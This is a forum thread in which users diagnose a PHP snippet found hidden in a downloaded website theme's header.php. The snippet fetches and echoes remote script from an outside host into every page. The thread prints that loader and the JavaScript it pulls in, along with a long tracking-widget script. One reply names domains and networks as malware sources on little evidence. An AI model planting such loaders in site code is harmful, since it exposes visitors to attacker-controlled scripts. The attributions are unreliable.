Board index   FAQ   Search  
Register  Login
Board index php forum :: php coding PHP coding => General

Is this malicious code?

Ask about general coding issues or problems here.

Moderators: macek, egami, gesf

Is this malicious code?

Postby jlauria22 » Thu Nov 10, 2011 10:40 pm

I have knowledge of html and css but not php. In a website template that I had downloaded it had the following codw in the header.php file. Can someone please explain to me if it is malicious, what it means or what it is commanding? The code is:

<?php
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
jlauria22
New php-forum User
New php-forum User
 
Posts: 1
Joined: Thu Nov 10, 2011 10:37 pm

Re: Is this malicious code?

Postby roke24768 » Mon Nov 21, 2011 10:31 am

I'd be interested to know too what this code does, and whether I could speed up my site by removing it. Much appreciated.
roke24768
New php-forum User
New php-forum User
 
Posts: 2
Joined: Mon Nov 21, 2011 10:29 am

Re: Is this malicious code?

Postby egami » Mon Nov 21, 2011 12:24 pm

The code itself isn't really mallicious, it's what the code is downloading that might be.
User avatar
egami
php-forum GURU
php-forum GURU
 
Posts: 2197
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Postby egami » Mon Nov 21, 2011 12:28 pm

OK, so.. it's quite easy.

This script downloads this script..

Code: Select all
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://4llw4d.freefilesblog.com/jquery.js"></scr'+'ipt>'); } </script>


and the file http://4llw4d.freefilesblog.com/jquery.js is empty when downloading it straight up.. so it's probably an .htaccess problem because I'm not connecting directly to the website in someway.

I would be cautious of it, to be frank.
User avatar
egami
php-forum GURU
php-forum GURU
 
Posts: 2197
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this malicious code?

Postby roke24768 » Mon Nov 21, 2011 11:43 pm

Thanks for the help.

Two lines above in the downloaded script, there is a jquery.min.js. I tried to open it with notepad, but it wouldn't open.

There is also a file untitled3.html in the wordpress theme .js folder with the same extract of code as originally posted.

I tried to just remove the code from the header.php file, but the site stops working.

I appreciate the warning to be cautious of it. I had put a bit of work into customising it before I noticed what it was doing. Hope it hasn't done too much damage.

If anyone has any more insights that would be much appreciated.
roke24768
New php-forum User
New php-forum User
 
Posts: 2
Joined: Mon Nov 21, 2011 10:29 am

Re: Is this malicious code?

Postby orpapage » Thu Jan 19, 2012 1:56 pm

just faced the exact same problem.
the solution is quite simple..
just delete that php code! Yes that's right--> select code. ctrl+x. Update File.
Just did it myself and it works like a beauty! Website loads much much faster also.

oh! i almost forgot! if for any reason things don't go as planned--> go to the same place in the file. ctrl+v. Update File :D
orpapage
New php-forum User
New php-forum User
 
Posts: 1
Joined: Thu Jan 19, 2012 1:47 pm

Re: Is this malicious code?

Postby TheProdigyGuy » Thu Jan 19, 2012 2:15 pm

IMHO it is suspicious and using this way (lets say if it is legal site but hacked and that .js files spoofed)
that guys can infect your site visitors+exploit some 0day vulnerabilities against Flash players+Java Plugins+redirect to malware domains+Phish+DDOS another sites using your Real Visitors UA+IP(because it has advantages!) and Finally create BOTNET from your site visitors.

Without referer:
<span style="display:none"><script id="_wau02f">var _wau = _wau || []; _wau.push(["small", "oyh4xtc1j9zo", "02f"]);(function() { var s=document.createElement("script"); s.async=true; s.src="http://widgets.amung.us/small.js";document.getElementsByTagName("head")[0].appendChild(s);})();</script>
</span>







============================================================
=====================================================================================

cmd> GET /small.js HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
cmd> Host: widgets.amung.us
cmd>
hdr> HTTP/1.1 200 OK
hdr> Date: Thu, 19 Jan 2012 22:26:34 GMT
hdr> Content-Type: application/x-javascript
hdr> Content-Length: 4212
hdr> Last-Modified: Wed, 18 Jan 2012 06:52:38 GMT
hdr> Connection: close
hdr> Server: Apache/1.1 (Windows 4.00.950)
hdr> Expires: Sat, 18 Feb 2012 22:26:34 GMT
hdr> Cache-Control: max-age=2592000
hdr> Accept-Ranges: bytes
RequestDone Error = 0
StatusCode = 200

=====================================================================================

+===> widgets.amung.us malware domain+For calculation count of users!
==> http://cdn.tynt.com/tc.js well known malware domain!

<img src="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw=="></img>
It also calculates how much "online users"

Code: Select all
var Tynt=Tynt||[];if(typeof _wau!=="undefined"){var WAU_ren=WAU_ren||[];clearTimeout(window.WAU_f_init);window.WAU_f_init=setTimeout(WAU_pl,300)}function WAU_small(b,d){if(typeof d==="undefined"){var d=-1}var a="";if(document.title){a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))}var c=document.getElementsByTagName("script")[0];(function(){var f=encodeURIComponent(document.referrer);var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src="http://whos.amung.us/pingjs/?k="+b+"&t="+a+"&c=s&y="+f+"&a="+d+"&r="+Math.ceil(Math.random()*999999);c.parentNode.insertBefore(e,c)})();if(document.location.protocol=="http:"){Tynt.push("w!"+b);(function(){var e=document.createElement("script");e.async="async";e.type="text/javascript";e.src="http://cdn.tynt.com/tc.js";c.parentNode.insertBefore(e,c)})()}}function WAU_r_s(c,key,async_index){if(typeof async_index==="undefined"){var async_index=-1}var raw_im_data="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";var meta=eval(raw_im_meta);if(WAU_legacy_b()){raw_im_data="http://widgets.amung.us/widtemplates/smalloutline.gif"}c+="o";c=c.split("");var img=document.createElement("img");img.onload=function(){var wid=document.createElement("div");wid.style.position="relative";wid.style.display="inline-block";wid.style.backgroundImage="url("+raw_im_data+")";wid.style.width="80px";wid.style.height="15px";wid.style.padding="0";wid.style.margin="0";wid.style.overflow="hidden";wid.style.cursor="pointer";wid.title="Click to see stats for this site by whos.amung.us ("+key+")";var x_pos=20;if(c.length>6&&c[0]!="1"){x_pos=16}else{if(c.length>6&&c[0]=="1"){x_pos=17}}for(var i=0;i<c.length;i++){var char_meta=meta[c[i]];var character=document.createElement("div");character.style.backgroundImage="url("+raw_im_data+")";character.style.backgroundRepeat="no-repeat";character.style.backgroundAttachment="scroll";character.style.backgroundPosition=char_meta[0]+"px "+char_meta[1]+"px";character.style.position="absolute";character.style.width=char_meta[2]+"px";character.style.height=char_meta[3]+"px";character.style.top="4px";character.style.left=x_pos+"px";character.style.lineHeight=char_meta[3]+"px";character.style.overflow="hidden";character.style.padding="0";character.style.margin="0";wid.appendChild(character);x_pos+=char_meta[2]+1}wid.onclick=function(){window.location="http://whos.amung.us/stats/"+key+"/"};if(async_index>=0){var scr=document.getElementById("_wau"+_wau[async_index][2]);scr.parentNode.insertBefore(wid,scr.nextSibling)}else{WAU_insert(wid,"amung.us/small.js")}};img.src=raw_im_data}function WAU_insert(c,d){var a=document.getElementsByTagName("script");for(var b=0;b<a.length;b++){if(a[b].src.indexOf(d)>0){a[b].parentNode.insertBefore(c,a[b].nextSibling)}}}function WAU_legacy_b(){if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8){return true}return false}function WAU_pl(){document.body?WAU_la():setTimeout(WAU_pl,500)}function WAU_la(){for(var a=0;a<_wau.length;a++){if(typeof WAU_ren[a]==="undefined"||WAU_ren[a]==false){WAU_ren[a]=true;if(typeof window["WAU_"+_wau[a][0]]==="function"){if(_wau[a][0]=="map"){window.WAU_map(_wau[a][1],_wau[a][3],_wau[a][4],_wau[a][5],_wau[a][6],a)}else{if(typeof _wau[a][3]!=="undefined"){window["WAU_"+_wau[a][0]](_wau[a][1],_wau[a][3],a)}else{window["WAU_"+_wau[a][0]](_wau[a][1],a)}}}}}};







The site naruto-spoilers.com is travelling around the World Downloading malware. The Journey starts in the USA, then moves to Europe (Germany/Austria) and it ends in China.

Google Tag:
List of Naruto: Shippuden episodes. Naruto is an anime series based on the manga series of the same.

The Cyber Criminals are using AS21844 network to dish out the
infection process. If one malware sites is taking out, a new one will take its place immediately.

The variants found start from Trojan Downloaders all the way up to Fake AV Infections.

The Journey starts at naruto-spoilers.com IP 74.220.207.145:

Malware found on iP:74.220.207.145
PHP/Pbot.A
PHP/Agent.DZ
PHP/BackDoor.AR

naruto-spoilers.com Hosted on Malicious Network:

AS11798 /Bluehost Inc.
Malware Found on AS11798
Trojan Zbot
FakeAV
Exploits

The traffic goes to widgets.amung.us IP 173.192.225.170 through 174.123.133.231
The sites are being hosted on the AS21844. This network is being flagged as
malicious.

Network Info:

Network Name The Planet Internet Services
Primary ASN 21844
Website hxxp://www.theplanet.com
Then katzu.info IP 174.123.133.233




It is really great thing:
grep -r '4llw4d.freefilesblog.com' * |less
TheProdigyGuy
New php-forum User
New php-forum User
 
Posts: 215
Joined: Wed Dec 07, 2011 5:25 pm


Return to PHP coding => General

Who is online

Users browsing this forum: No registered users and 1 guest

Sponsored by Sitebuilder Web hosting and Traduzioni Italiano Rumeno and antispam for cPanel.

cron